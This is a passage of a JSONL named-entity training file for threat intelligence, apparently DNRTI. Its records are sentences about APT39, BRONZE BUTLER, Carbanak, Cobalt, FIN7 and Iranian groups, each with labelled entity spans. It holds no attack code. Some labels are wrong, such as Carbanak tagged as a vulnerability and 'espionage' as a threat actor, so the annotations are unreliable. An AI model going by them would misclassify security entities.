"dnrti_train"}} {"text": "APT39 's focus on the telecommunications and travel industries suggests intent to perform monitoring , tracking , or surveillance operations against specific individuals , collect proprietary or customer data for commercial or operational purposes that serve strategic requirements related to national priorities , or create additional accesses and vectors to facilitate future campaigns .", "spans": {"THREAT_ACTOR: APT39": [[0, 5]], "ORGANIZATION: specific individuals": [[149, 169]]}, "info": {"id": "dnrti_train_000293", "source": "dnrti_train"}} {"text": "Other groups attributed to Iranian attackers , such as Rocket Kitten , have targeted Iranian individuals in the past , including anonymous proxy users , researchers , journalists , and dissidents .", "spans": {"THREAT_ACTOR: groups": [[6, 12]], "THREAT_ACTOR: attackers": [[35, 44]], "THREAT_ACTOR: Rocket Kitten": [[55, 68]], "ORGANIZATION: anonymous proxy users": [[129, 150]], "ORGANIZATION: researchers": [[153, 164]], "ORGANIZATION: journalists": [[167, 178]], "ORGANIZATION: dissidents": [[185, 195]]}, "info": {"id": "dnrti_train_000294", "source": "dnrti_train"}} {"text": "Remexi is a basic back door Trojan that allows Cadelle to open a remote shell on the computer and execute commands .", "spans": {"TOOL: Remexi": [[0, 6]], "THREAT_ACTOR: Cadelle": [[47, 54]]}, "info": {"id": "dnrti_train_000295", "source": "dnrti_train"}} {"text": "Remexi is a basic back door Trojan that allows attackers to open a remote shell on the computer and execute commands .", "spans": {"TOOL: Remexi": [[0, 6]], "THREAT_ACTOR: attackers": [[47, 56]]}, "info": {"id": "dnrti_train_000296", "source": "dnrti_train"}} {"text": "One group , which we call Cadelle , uses Backdoor.Cadelspy , while the other , which we've named Chafer , uses Backdoor.Remexi and Backdoor.Remexi.B .", "spans": {"THREAT_ACTOR: group": [[4, 9]], "THREAT_ACTOR: Cadelle": [[26, 33]], "TOOL: Backdoor.Cadelspy": [[41, 58]], "THREAT_ACTOR: 
Chafer": [[97, 103]], "TOOL: Backdoor.Remexi": [[111, 126]], "TOOL: Backdoor.Remexi.B": [[131, 148]]}, "info": {"id": "dnrti_train_000297", "source": "dnrti_train"}} {"text": "APT39 facilitates lateral movement through myriad tools such as Remote Desktop Protocol ( RDP ) , Secure Shell ( SSH ) , PsExec , RemCom , and xCmdSvc .", "spans": {"THREAT_ACTOR: APT39": [[0, 5]], "TOOL: Remote Desktop Protocol": [[64, 87]], "TOOL: RDP": [[90, 93]], "TOOL: Secure Shell": [[98, 110]], "TOOL: SSH": [[113, 116]], "TOOL: PsExec": [[121, 127]], "TOOL: RemCom": [[130, 136]], "TOOL: xCmdSvc": [[143, 150]]}, "info": {"id": "dnrti_train_000298", "source": "dnrti_train"}} {"text": "The APT39 were using an improved version of Remexi in what the victimology suggests might be a domestic cyber-espionage operation .", "spans": {"THREAT_ACTOR: APT39": [[4, 9]]}, "info": {"id": "dnrti_train_000299", "source": "dnrti_train"}} {"text": "A well-funded , highly active group of Middle Eastern hackers was caught , yet again , using a lucrative zero-day exploit in the wild to break into computers and infect them with powerful spyware developed by an infamous cyberweapons dealer named Gamma Group .", "spans": {"THREAT_ACTOR: group": [[30, 35]], "THREAT_ACTOR: hackers": [[54, 61]], "VULNERABILITY: zero-day exploit": [[105, 121]], "THREAT_ACTOR: Gamma Group": [[247, 258]]}, "info": {"id": "dnrti_train_000300", "source": "dnrti_train"}} {"text": "A well-funded , highly active BlackOasis group of Middle Eastern hackers was caught , yet again , using a lucrative zero-day exploit in the wild to break into computers and infect them with powerful spyware developed by an infamous cyberweapons dealer named Gamma Group .", "spans": {"THREAT_ACTOR: BlackOasis group": [[30, 46]], "THREAT_ACTOR: hackers": [[65, 72]], "VULNERABILITY: zero-day exploit": [[116, 132]], "THREAT_ACTOR: Gamma Group": [[258, 269]]}, "info": {"id": "dnrti_train_000301", "source": "dnrti_train"}} {"text": "The Middle Eastern hacker group 
in this case is codenamed \" BlackOasis \" .", "spans": {"THREAT_ACTOR: hacker group": [[19, 31]], "THREAT_ACTOR: BlackOasis": [[60, 70]]}, "info": {"id": "dnrti_train_000302", "source": "dnrti_train"}} {"text": "Kaspersky found the BlackOasis group was exploiting a Adobe Flash Player zero-day vulnerability ( CVE-2016-4117 ) to remotely deliver the latest version of \" FinSpy \" malware , according to a new blog post published Monday .", "spans": {"ORGANIZATION: Kaspersky": [[0, 9]], "THREAT_ACTOR: BlackOasis group": [[20, 36]], "VULNERABILITY: Adobe Flash Player zero-day vulnerability": [[54, 95]], "VULNERABILITY: CVE-2016-4117": [[98, 111]], "TOOL: FinSpy": [[158, 164]]}, "info": {"id": "dnrti_train_000303", "source": "dnrti_train"}} {"text": "Kaspersky found the group was exploiting a Adobe Flash Player zero-day vulnerability ( CVE-2016-4117 ) to remotely deliver the latest version of \" FinSpy \" malware , according to a new blog post published Monday .", "spans": {"ORGANIZATION: Kaspersky": [[0, 9]], "THREAT_ACTOR: group": [[20, 25]], "VULNERABILITY: Adobe Flash Player zero-day vulnerability": [[43, 84]], "VULNERABILITY: CVE-2016-4117": [[87, 100]], "TOOL: FinSpy": [[147, 153]]}, "info": {"id": "dnrti_train_000304", "source": "dnrti_train"}} {"text": "BlackOasis ' interests span a wide gamut of figures involved in Middle Eastern politics .", "spans": {"THREAT_ACTOR: BlackOasis": [[0, 10]]}, "info": {"id": "dnrti_train_000305", "source": "dnrti_train"}} {"text": "REDBALDKNIGHT , also known as BRONZE BUTLER and Tick , is a cyberespionage group known to target Japanese organizations such as government agencies ( including defense ) as well as those in biotechnology , electronics manufacturing , and industrial chemistry .", "spans": {"THREAT_ACTOR: REDBALDKNIGHT": [[0, 13]], "THREAT_ACTOR: BRONZE BUTLER": [[30, 43]], "THREAT_ACTOR: Tick": [[48, 52]], "THREAT_ACTOR: cyberespionage group": [[60, 80]], "ORGANIZATION: government agencies": [[128, 147]]}, "info": 
{"id": "dnrti_train_000306", "source": "dnrti_train"}} {"text": "REDBALDKNIGHT , also known as BRONZE BUTLER and Tick , is a cyberespionage group known to target Japan such as government agencies as well as those in biotechnology , electronics manufacturing , and industrial chemistry .", "spans": {"THREAT_ACTOR: REDBALDKNIGHT": [[0, 13]], "THREAT_ACTOR: BRONZE BUTLER": [[30, 43]], "THREAT_ACTOR: Tick": [[48, 52]], "THREAT_ACTOR: cyberespionage group": [[60, 80]], "ORGANIZATION: government agencies": [[111, 130]]}, "info": {"id": "dnrti_train_000307", "source": "dnrti_train"}} {"text": "In fact , REDBALDKNIGHT has been targeting Japan as early as 2008 , based on the file properties of the decoy documents they've been sending to their targets .", "spans": {"THREAT_ACTOR: REDBALDKNIGHT": [[10, 23]], "MALWARE: decoy documents": [[104, 119]]}, "info": {"id": "dnrti_train_000308", "source": "dnrti_train"}} {"text": "In fact , REDBALDKNIGHT has been zeroing in on Japanese organizations as early as 2008 — at least based on the file properties of the decoy documents they've been sending to their targets .", "spans": {"THREAT_ACTOR: REDBALDKNIGHT": [[10, 23]], "MALWARE: decoy documents": [[134, 149]]}, "info": {"id": "dnrti_train_000309", "source": "dnrti_train"}} {"text": "Secureworks® incident responders and Counter Threat Unit™ ( CTU ) researchers investigated activities associated with the BRONZE BUTLER ( also known as Tick ) threat group , which likely originates in the People .", "spans": {"ORGANIZATION: Secureworks®": [[0, 12]], "ORGANIZATION: CTU": [[60, 63]], "THREAT_ACTOR: BRONZE BUTLER": [[122, 135]], "THREAT_ACTOR: Tick": [[152, 156]], "THREAT_ACTOR: threat group": [[159, 171]]}, "info": {"id": "dnrti_train_000310", "source": "dnrti_train"}} {"text": "Targeting data supports the belief that APT39 's key mission is to track or monitor targets of interest , collect personal information , including travel itineraries , and gather customer data from 
telecommunications firms .", "spans": {"THREAT_ACTOR: APT39": [[40, 45]], "ORGANIZATION: telecommunications firms": [[198, 222]]}, "info": {"id": "dnrti_train_000311", "source": "dnrti_train"}} {"text": "BRONZE BUTLER has used a broad range of publicly available ( Mimikatz and gsecdump ) and proprietary ( Daserf and Datper ) tools .", "spans": {"THREAT_ACTOR: BRONZE BUTLER": [[0, 13]], "TOOL: Mimikatz": [[61, 69]], "TOOL: gsecdump": [[74, 82]], "TOOL: Daserf": [[103, 109]], "TOOL: Datper": [[114, 120]]}, "info": {"id": "dnrti_train_000312", "source": "dnrti_train"}} {"text": "BRONZE BUTLER are also fluent in Japanese , crafting phishing emails in native Japanese and operating successfully within a Japanese-language environment .", "spans": {"THREAT_ACTOR: BRONZE BUTLER": [[0, 13]]}, "info": {"id": "dnrti_train_000313", "source": "dnrti_train"}} {"text": "BRONZE BUTLER has demonstrated the ability to identify a significant zero-day vulnerability within a popular Japanese corporate tool and then use scan-and-exploit techniques to indiscriminately compromise Japanese Internet-facing enterprise systems .", "spans": {"THREAT_ACTOR: BRONZE BUTLER": [[0, 13]], "VULNERABILITY: zero-day vulnerability": [[69, 91]]}, "info": {"id": "dnrti_train_000314", "source": "dnrti_train"}} {"text": "The group has demonstrated the ability to identify a significant zero-day vulnerability within a popular Japanese corporate tool and then use scan-and-exploit techniques to indiscriminately compromise Japanese Internet-facing enterprise systems .", "spans": {"THREAT_ACTOR: group": [[4, 9]], "VULNERABILITY: zero-day vulnerability": [[65, 87]]}, "info": {"id": "dnrti_train_000315", "source": "dnrti_train"}} {"text": "BRONZE BUTLER has used phishing emails with Flash animation attachments to download and execute Daserf malware , and has also leveraged Flash exploits for SWC attacks .", "spans": {"THREAT_ACTOR: BRONZE BUTLER": [[0, 13]], "TOOL: Daserf malware": [[96, 110]], "VULNERABILITY: Flash 
exploits": [[136, 150]]}, "info": {"id": "dnrti_train_000316", "source": "dnrti_train"}} {"text": "The group has used phishing emails with Flash animation attachments to download and execute Daserf malware , and has also leveraged Flash exploits for SWC attacks .", "spans": {"THREAT_ACTOR: group": [[4, 9]], "TOOL: Daserf malware": [[92, 106]], "VULNERABILITY: Flash exploits": [[132, 146]]}, "info": {"id": "dnrti_train_000317", "source": "dnrti_train"}} {"text": "BRONZE BUTLER uses credential theft tools such as Mimikatz and WCE to steal authentication information from the memory of compromised hosts .", "spans": {"THREAT_ACTOR: BRONZE BUTLER": [[0, 13]], "TOOL: Mimikatz": [[50, 58]], "TOOL: WCE": [[63, 66]]}, "info": {"id": "dnrti_train_000318", "source": "dnrti_train"}} {"text": "While investigating a 2016 intrusion , Secureworks identified BRONZE BUTLER exploiting a then-unpatched remote code execution vulnerability ( CVE-2016-7836 ) in SKYSEA Client View , a popular Japanese product used to manage an organization .", "spans": {"ORGANIZATION: Secureworks": [[39, 50]], "THREAT_ACTOR: BRONZE BUTLER": [[62, 75]], "VULNERABILITY: CVE-2016-7836": [[142, 155]]}, "info": {"id": "dnrti_train_000319", "source": "dnrti_train"}} {"text": "While investigating a 2016 intrusion , Secureworks incident responders identified BRONZE BUTLER exploiting a then-unpatched remote code execution vulnerability ( CVE-2016-7836 ) in SKYSEA Client View , a popular Japanese product used to manage an organization .", "spans": {"ORGANIZATION: Secureworks": [[39, 50]], "THREAT_ACTOR: BRONZE BUTLER": [[82, 95]], "VULNERABILITY: CVE-2016-7836": [[162, 175]]}, "info": {"id": "dnrti_train_000320", "source": "dnrti_train"}} {"text": "Several xxmm samples analyzed by CTU researchers incorporate Mimikatz , allowing BRONZE BUTLER to issue Mimikatz commands directly from xxmm .", "spans": {"ORGANIZATION: CTU": [[33, 36]], "TOOL: Mimikatz": [[61, 69], [104, 112]], "THREAT_ACTOR: BRONZE BUTLER": [[81, 
94]]}, "info": {"id": "dnrti_train_000321", "source": "dnrti_train"}} {"text": "BRONZE BUTLER compromises organizations to conduct cyberespionage , primarily focusing on Japan .", "spans": {"THREAT_ACTOR: BRONZE BUTLER": [[0, 13]], "THREAT_ACTOR: cyberespionage": [[51, 65]]}, "info": {"id": "dnrti_train_000322", "source": "dnrti_train"}} {"text": "Symantec discovered the most recent wave of Tick attacks in July 2015 , when the group compromised three different Japanese websites with a Flash ( .swf ) exploit to mount watering hole attacks .", "spans": {"ORGANIZATION: Symantec": [[0, 8]], "THREAT_ACTOR: group": [[81, 86]]}, "info": {"id": "dnrti_train_000323", "source": "dnrti_train"}} {"text": "Symantec discovered the most recent wave of Tick attacks in July 2015 , when BRONZE BUTLER compromised three different Japanese websites with a Flash ( .swf ) exploit to mount watering hole attacks .", "spans": {"ORGANIZATION: Symantec": [[0, 8]], "THREAT_ACTOR: BRONZE BUTLER": [[77, 90]]}, "info": {"id": "dnrti_train_000325", "source": "dnrti_train"}} {"text": "In some cases , the attackers used the Society for Worldwide Interbank Financial Telecommunication ( SWIFT ) network to transfer money to their accounts .", "spans": {"THREAT_ACTOR: attackers": [[20, 29]], "TOOL: Worldwide Interbank Financial Telecommunication": [[51, 98]], "TOOL: SWIFT": [[101, 106]]}, "info": {"id": "dnrti_train_000326", "source": "dnrti_train"}} {"text": "Carbanak is a backdoor used by the attackers to compromise the victim .", "spans": {"MALWARE: Carbanak": [[0, 8]], "TOOL: backdoor": [[14, 22]], "THREAT_ACTOR: attackers": [[35, 44]]}, "info": {"id": "dnrti_train_000327", "source": "dnrti_train"}} {"text": "Carbanak is also aware of the IFOBS banking application and can , on command , substitute the details of payment documents in the IFOBS system .", "spans": {"VULNERABILITY: Carbanak": [[0, 8]]}, "info": {"id": "dnrti_train_000330", "source": "dnrti_train"}} {"text": "Sensitive bank documents 
have be found on the servers that were controlling Carbanak .", "spans": {"VULNERABILITY: Carbanak": [[76, 84]]}, "info": {"id": "dnrti_train_000331", "source": "dnrti_train"}} {"text": "Existing telemetry indicates that the Carbanak attackers are trying to expand operations to other Baltic and Central Europe countries , the Middle East , Asia and Africa .", "spans": {"VULNERABILITY: Carbanak": [[38, 46]], "THREAT_ACTOR: attackers": [[47, 56]]}, "info": {"id": "dnrti_train_000332", "source": "dnrti_train"}} {"text": "FIN7 is a financially-motivated threat group that has been associated with malicious operations dating back to late 2015 .", "spans": {"THREAT_ACTOR: FIN7": [[0, 4]], "THREAT_ACTOR: threat group": [[32, 44]]}, "info": {"id": "dnrti_train_000333", "source": "dnrti_train"}} {"text": "As with previous campaigns , and as highlighted in our annual M-Trends 2017 report , FIN7 is calling stores at targeted organizations to ensure they received the email and attempting to walk them through the infection process .", "spans": {"ORGANIZATION: M-Trends": [[62, 70]], "THREAT_ACTOR: FIN7": [[85, 89]]}, "info": {"id": "dnrti_train_000334", "source": "dnrti_train"}} {"text": "While FIN7 has embedded VBE as OLE objects for over a year , they continue to update their script launching mechanisms .", "spans": {"THREAT_ACTOR: FIN7": [[6, 10]], "TOOL: VBE": [[24, 27]]}, "info": {"id": "dnrti_train_000336", "source": "dnrti_train"}} {"text": "This report describes the details and type of operations carried out by Carbanak that focuses on financial industry , such as payment providers , retail industry and PR companies .", "spans": {"VULNERABILITY: Carbanak": [[72, 80]], "ORGANIZATION: payment providers": [[126, 143]], "ORGANIZATION: PR companies": [[166, 178]]}, "info": {"id": "dnrti_train_000337", "source": "dnrti_train"}} {"text": "The group has its origin in more common financial fraud including theft from consumer and corporate bank accounts in Europe and Russia , using 
standard banking malware , mainly Carberp .", "spans": {"THREAT_ACTOR: group": [[4, 9]], "ORGANIZATION: consumer": [[77, 85]], "TOOL: Carberp": [[177, 184]]}, "info": {"id": "dnrti_train_000339", "source": "dnrti_train"}} {"text": "From 2013 Carbanak intensified its activity focused on banks and electronic payment systems in Russia and in the post-Soviet space .", "spans": {"VULNERABILITY: Carbanak": [[10, 18]]}, "info": {"id": "dnrti_train_000340", "source": "dnrti_train"}} {"text": "Since 2013 Carbanak has successfully gained access to networks of more than 50 banks and 5 payment systems .", "spans": {"VULNERABILITY: Carbanak": [[11, 19]]}, "info": {"id": "dnrti_train_000341", "source": "dnrti_train"}} {"text": "The first successful bank robbery was committed by this group in January 2013 .", "spans": {"THREAT_ACTOR: group": [[56, 61]]}, "info": {"id": "dnrti_train_000342", "source": "dnrti_train"}} {"text": "To reduce the risk of losing access to the internal bank network , the Carbanak , in addition to malicious programs , also used for remote access legitimate programs such as Ammy Admin and Team Viewer .", "spans": {"VULNERABILITY: Carbanak": [[71, 79]], "TOOL: Ammy Admin": [[174, 184]], "TOOL: Team Viewer": [[189, 200]]}, "info": {"id": "dnrti_train_000343", "source": "dnrti_train"}} {"text": "We have no evidence of compromises against banks in Western Europe or United States , but it should be noted that the attackers methods could be utilized against banks outside of Russia as well .", "spans": {"THREAT_ACTOR: attackers": [[118, 127]]}, "info": {"id": "dnrti_train_000344", "source": "dnrti_train"}} {"text": "Additionally the reports on Carbanak show a different picture , where banks targeted outside of Russia , specifically Europe , USA and Japan are mentioned , which does not match our research .", "spans": {"VULNERABILITY: Carbanak": [[28, 36]]}, "info": {"id": "dnrti_train_000345", "source": "dnrti_train"}} {"text": "Without any insight into the 
evidence Kaspersky has obtained , we can only repeat our view that Anunak has targeted only banks in Russia and we have no concrete reports of compromised banks outside of Russia directly related to this criminal group .", "spans": {"ORGANIZATION: Kaspersky": [[38, 47]], "THREAT_ACTOR: Anunak": [[96, 102]], "THREAT_ACTOR: criminal group": [[233, 247]]}, "info": {"id": "dnrti_train_000346", "source": "dnrti_train"}} {"text": "Charming Kitten is an Iranian cyberespionage group operating since approximately 2014 .", "spans": {"THREAT_ACTOR: Charming Kitten": [[0, 15]], "THREAT_ACTOR: cyberespionage group": [[30, 50]]}, "info": {"id": "dnrti_train_000347", "source": "dnrti_train"}} {"text": "These attacks have included criminal groups responsible for the delivery of NewPosThings , MalumPOS and PoSeidon point of sale Malware , as well as Carbanak from the Russian criminal organization we track as Carbon Spider .", "spans": {"THREAT_ACTOR: criminal groups": [[28, 43]], "THREAT_ACTOR: PoSeidon": [[104, 112]], "VULNERABILITY: Carbanak": [[148, 156]], "THREAT_ACTOR: criminal organization": [[174, 195]], "THREAT_ACTOR: Carbon Spider": [[208, 221]]}, "info": {"id": "dnrti_train_000348", "source": "dnrti_train"}} {"text": "The Charming Kitten' focus appears to be individuals of interest to Iran in the fields of academic research .", "spans": {"THREAT_ACTOR: Charming Kitten'": [[4, 20]]}, "info": {"id": "dnrti_train_000349", "source": "dnrti_train"}} {"text": "Sometimes , they aim at establishing a foothold on the target 's computer to gain access into their organization , but , based on our data , this is usually not their main objective , as opposed to other Iranian threat groups , such as OilRig and CopyKittens .", "spans": {"THREAT_ACTOR: threat groups": [[212, 225]], "THREAT_ACTOR: OilRig": [[236, 242]], "THREAT_ACTOR: CopyKittens": [[247, 258]]}, "info": {"id": "dnrti_train_000350", "source": "dnrti_train"}} {"text": "Flying Kitten ( which is another name given by the 
security industry to Charming Kitten ) was one of the first groups to be described as a coherent threat actor conducting operations against political opponents of the IRI ( Islamic Republic of Iran ) government and foreign espionage targets .", "spans": {"THREAT_ACTOR: Flying Kitten": [[0, 13]], "THREAT_ACTOR: Charming Kitten": [[72, 87]], "THREAT_ACTOR: groups": [[111, 117]], "THREAT_ACTOR: threat actor": [[148, 160]], "THREAT_ACTOR: espionage": [[274, 283]]}, "info": {"id": "dnrti_train_000351", "source": "dnrti_train"}} {"text": "Flying Kitten was one of the first groups to be described as a coherent threat actor conducting operations against political opponents of government and foreign espionage targets .", "spans": {"THREAT_ACTOR: Flying Kitten": [[0, 13]], "THREAT_ACTOR: groups": [[35, 41]], "THREAT_ACTOR: threat actor": [[72, 84]], "THREAT_ACTOR: espionage": [[161, 170]]}, "info": {"id": "dnrti_train_000352", "source": "dnrti_train"}} {"text": "At certain times , Mesri has been a member of an Iran-based hacking group called the Turk Black Hat security team \" .", "spans": {"THREAT_ACTOR: hacking group": [[60, 73]], "THREAT_ACTOR: Turk Black Hat": [[85, 99]]}, "info": {"id": "dnrti_train_000353", "source": "dnrti_train"}} {"text": "During intense intelligence gathering over the last 24 months , we observed the technical capabilities of the Operation Cleaver team rapidly evolve faster than any previously observed Iranian effort .", "spans": {"THREAT_ACTOR: Operation Cleaver": [[110, 127]]}, "info": {"id": "dnrti_train_000354", "source": "dnrti_train"}} {"text": "TinyZBot is a bot written in C# and developed by the Cleaver team .", "spans": {"TOOL: TinyZBot": [[0, 8]], "THREAT_ACTOR: Cleaver": [[53, 60]]}, "info": {"id": "dnrti_train_000355", "source": "dnrti_train"}} {"text": "Some of the teams publicly known today include Iranian Cyber Army , Ashiyane , Islamic Cyber Resistance Group , Izz ad-Din al-Qassam Cyber Fighters , Parastoo , Shabgard , Iran Black 
Hats and many others 9 .", "spans": {"THREAT_ACTOR: Cyber Army": [[55, 65]], "THREAT_ACTOR: Ashiyane": [[68, 76]], "THREAT_ACTOR: Cyber Resistance Group": [[87, 109]], "THREAT_ACTOR: Izz ad-Din al-Qassam Cyber Fighters": [[112, 147]], "THREAT_ACTOR: Parastoo": [[150, 158]], "THREAT_ACTOR: Shabgard": [[161, 169]], "THREAT_ACTOR: Iran Black Hats": [[172, 187]]}, "info": {"id": "dnrti_train_000356", "source": "dnrti_train"}} {"text": "However , even though the TTPs of the Cleaver team have some overlap to techniques used by Iranian Cyber Army ( botnets ) , Ashiyane ( SQL injection ) and Syrian Electronic Army ( phishing ) , we believe this is largely the work of a new team .", "spans": {"THREAT_ACTOR: Cleaver": [[38, 45]], "THREAT_ACTOR: Cyber Army": [[99, 109]], "THREAT_ACTOR: Ashiyane": [[124, 132]]}, "info": {"id": "dnrti_train_000357", "source": "dnrti_train"}} {"text": "The Cobalt group 's traditional \" stomping grounds \" are the Eastern Europe , Central Asia , and Southeast Asia .", "spans": {"THREAT_ACTOR: Cobalt group": [[4, 16]]}, "info": {"id": "dnrti_train_000358", "source": "dnrti_train"}} {"text": "Against targets in the CIS countries , the Cobalt also used their own infrastructure , which included rented dedicated servers .", "spans": {"THREAT_ACTOR: Cobalt": [[43, 49]]}, "info": {"id": "dnrti_train_000359", "source": "dnrti_train"}} {"text": "In several cases , the Cobalt compromised company infrastructure and employee accounts in order to send phishing messages to partner companies in North and South America , Europe , CIS countries , and Central and Southeast Asia .", "spans": {"THREAT_ACTOR: Cobalt": [[23, 29]]}, "info": {"id": "dnrti_train_000360", "source": "dnrti_train"}} {"text": "To ensure remote access to the workstation of an employee at a target organization , the Cobalt group ( as in previous years ) uses Beacon , a Trojan available as part of commercial penetration testing software .", "spans": {"THREAT_ACTOR: Cobalt group": [[89, 101]], 
"TOOL: Beacon": [[132, 138]]}, "info": {"id": "dnrti_train_000361", "source": "dnrti_train"}} {"text": "Artifacts indicated the involvement of the Cobalt that , according to Positive Technologies information , from August to October had performed similar successful attacks in Eastern Europe , and it 's likely that this group may will soon become active in the West .", "spans": {"THREAT_ACTOR: Cobalt": [[43, 49]], "ORGANIZATION: Technologies information": [[79, 103]], "THREAT_ACTOR: group": [[217, 222]]}, "info": {"id": "dnrti_train_000362", "source": "dnrti_train"}} {"text": "In a recent spear-phishing campaign , the Cobalt Hacking Group used a remote code execution vulnerability in Microsoft Office software to connect to its command and control server via Cobalt Strike .", "spans": {"THREAT_ACTOR: Cobalt Hacking Group": [[42, 62]], "TOOL: Cobalt Strike": [[184, 197]]}, "info": {"id": "dnrti_train_000363", "source": "dnrti_train"}} {"text": "The basic principles of targeted attacks on financial institutions have not changed since 2013 when the Anunak , Corkow , Buhtrap , and Lurk groups began conducting the first attacks on Russian banks .", "spans": {"ORGANIZATION: financial institutions": [[44, 66]], "THREAT_ACTOR: Anunak": [[104, 110]], "THREAT_ACTOR: Corkow": [[113, 119]], "THREAT_ACTOR: Buhtrap": [[122, 129]], "THREAT_ACTOR: Lurk groups": [[136, 147]]}, "info": {"id": "dnrti_train_000364", "source": "dnrti_train"}} {"text": "In a recent spear-phishing campaign , the Cobalt Group used a known CVE to connect to its C&C server via Cobalt Strike , but ended up revealing all targets .", "spans": {"THREAT_ACTOR: Cobalt Group": [[42, 54]], "TOOL: Cobalt Strike": [[105, 118]]}, "info": {"id": "dnrti_train_000365", "source": "dnrti_train"}} {"text": "This isn't the first time we've seen Cobalt makes this error—back in March , an attack focussing on 1,880 targets across financial institutions in Kazakhstan had the same flaw .", "spans": {"THREAT_ACTOR: Cobalt": [[37, 
43]], "ORGANIZATION: financial institutions": [[121, 143]]}, "info": {"id": "dnrti_train_000366", "source": "dnrti_train"}} {"text": "The Carbanak attacks targeting over a 100 financial institutions worldwide .", "spans": {"ORGANIZATION: financial institutions": [[42, 64]]}, "info": {"id": "dnrti_train_000367", "source": "dnrti_train"}} {"text": "The leader of the crime gang behind the Carbanak and Cobalt malware attacks targeting over a 100 financial institutions worldwide has been arrested in Alicante , Spain , after a complex investigation conducted by the Spanish National Police .", "spans": {"THREAT_ACTOR: crime gang": [[18, 28]], "VULNERABILITY: Carbanak": [[40, 48]], "ORGANIZATION: financial institutions": [[97, 119]]}, "info": {"id": "dnrti_train_000368", "source": "dnrti_train"}} {"text": "Since 2013 , the Cobalt have attempted to attack banks and financial institutions using pieces of malware they designed .", "spans": {"THREAT_ACTOR: Cobalt": [[17, 23]], "ORGANIZATION: financial institutions": [[59, 81]]}, "info": {"id": "dnrti_train_000369", "source": "dnrti_train"}} {"text": "Since 2013 , the cybercrime gang have attempted to attack banks , e-payment systems and financial institutions using pieces of malware they designed , known as Carbanak and Cobalt .", "spans": {"THREAT_ACTOR: cybercrime gang": [[17, 32]], "ORGANIZATION: financial institutions": [[88, 110]], "VULNERABILITY: Carbanak": [[160, 168]], "TOOL: Cobalt": [[173, 179]]}, "info": {"id": "dnrti_train_000370", "source": "dnrti_train"}} {"text": "The organised crime group started its high-tech criminal activities in late 2013 by launching the Anunak malware campaign that targeted financial transfers and ATM networks of financial institutions around the world .", "spans": {"THREAT_ACTOR: crime group": [[14, 25]], "ORGANIZATION: financial institutions": [[176, 198]]}, "info": {"id": "dnrti_train_000371", "source": "dnrti_train"}} {"text": "One of the Cobalt Group 's latest campaigns , an attack 
that leads to a Cobalt Strike beacon and to JavaScript backdoor , was investigated and presented by the Talos research team .", "spans": {"THREAT_ACTOR: Cobalt Group": [[11, 23]], "TOOL: Cobalt": [[72, 78]], "TOOL: Strike beacon": [[79, 92]], "TOOL: JavaScript backdoor": [[100, 119]], "ORGANIZATION: Talos": [[160, 165]]}, "info": {"id": "dnrti_train_000372", "source": "dnrti_train"}} {"text": "The Cobalt started its high-tech criminal activities in late 2013 by launching the Anunak malware campaign that targeted financial transfers and ATM networks of financial institutions around the world .", "spans": {"THREAT_ACTOR: Cobalt": [[4, 10]], "ORGANIZATION: financial institutions": [[161, 183]]}, "info": {"id": "dnrti_train_000373", "source": "dnrti_train"}} {"text": "The Cobalt group misused Cobalt Strike , for instance , to perpetrate ATM cyber heists and target financial institutions across Europe , and interestingly , Russia .", "spans": {"THREAT_ACTOR: Cobalt group": [[4, 16]], "TOOL: Cobalt Strike": [[25, 38]], "THREAT_ACTOR: cyber heists": [[74, 86]], "ORGANIZATION: financial institutions": [[98, 120]]}, "info": {"id": "dnrti_train_000374", "source": "dnrti_train"}} {"text": "The hacking group misused Cobalt Strike , for instance , to perpetrate ATM cyber heists and target financial institutions across Europe , and interestingly , Russia .", "spans": {"THREAT_ACTOR: hacking group": [[4, 17]], "TOOL: Cobalt Strike": [[26, 39]], "THREAT_ACTOR: cyber heists": [[75, 87]], "ORGANIZATION: financial institutions": [[99, 121]]}, "info": {"id": "dnrti_train_000375", "source": "dnrti_train"}} {"text": "If successful , Cobalt goes on to attack financial institutions outside the country .", "spans": {"THREAT_ACTOR: Cobalt": [[16, 22]], "ORGANIZATION: financial institutions": [[41, 63]]}, "info": {"id": "dnrti_train_000376", "source": "dnrti_train"}} {"text": "The vulnerability was used to retrieve and execute Cobalt Strike from a remote server they controlled .", "spans": 
{"TOOL: Cobalt Strike": [[51, 64]]}, "info": {"id": "dnrti_train_000377", "source": "dnrti_train"}} {"text": "As part of our monitoring of Iranian threat agents activities , we have detected that since October 2016 and until the end of January 2017 , the Jerusalem Post , as well as multiple other Israeli websites and one website in the Palestinian Authority were compromised by Iranian threat agent CopyKittens .", "spans": {"ORGANIZATION: Jerusalem Post": [[145, 159]], "ORGANIZATION: Palestinian Authority": [[228, 249]], "THREAT_ACTOR: CopyKittens": [[291, 302]]}, "info": {"id": "dnrti_train_000378", "source": "dnrti_train"}} {"text": "CopyKittens use several self-developed malware and hacking tools that have not been publicly reported to date , and are analyzed in this report : TDTESS backdoor ; Vminst , a lateral movement tool ; NetSrv , a Cobalt Strike loader ; and ZPP , a files compression console program .", "spans": {"THREAT_ACTOR: CopyKittens": [[0, 11]], "TOOL: TDTESS backdoor": [[146, 161]], "TOOL: Vminst": [[164, 170]], "TOOL: NetSrv": [[199, 205]], "TOOL: Cobalt Strike loader": [[210, 230]], "TOOL: ZPP": [[237, 240]]}, "info": {"id": "dnrti_train_000379", "source": "dnrti_train"}} {"text": "CopyKittens often uses the trial version of Cobalt Strike , a publicly available commercial software for \" Adversary Simulations and Red Team Operations \" .", "spans": {"THREAT_ACTOR: CopyKittens": [[0, 11]], "TOOL: Cobalt Strike": [[44, 57]]}, "info": {"id": "dnrti_train_000380", "source": "dnrti_train"}} {"text": "Other public tools used by the CopyKittens are Metasploit , a well-known free and open source framework for developing and executing exploit code against a remote target machine ; Mimikatz , a post-exploitation tool that performs credential dumping ; and Empire , a PowerShell and Python post-exploitation agent .", "spans": {"THREAT_ACTOR: CopyKittens": [[31, 42]], "TOOL: Metasploit": [[47, 57]], "TOOL: Mimikatz": [[180, 188]], "TOOL: Empire": [[255, 
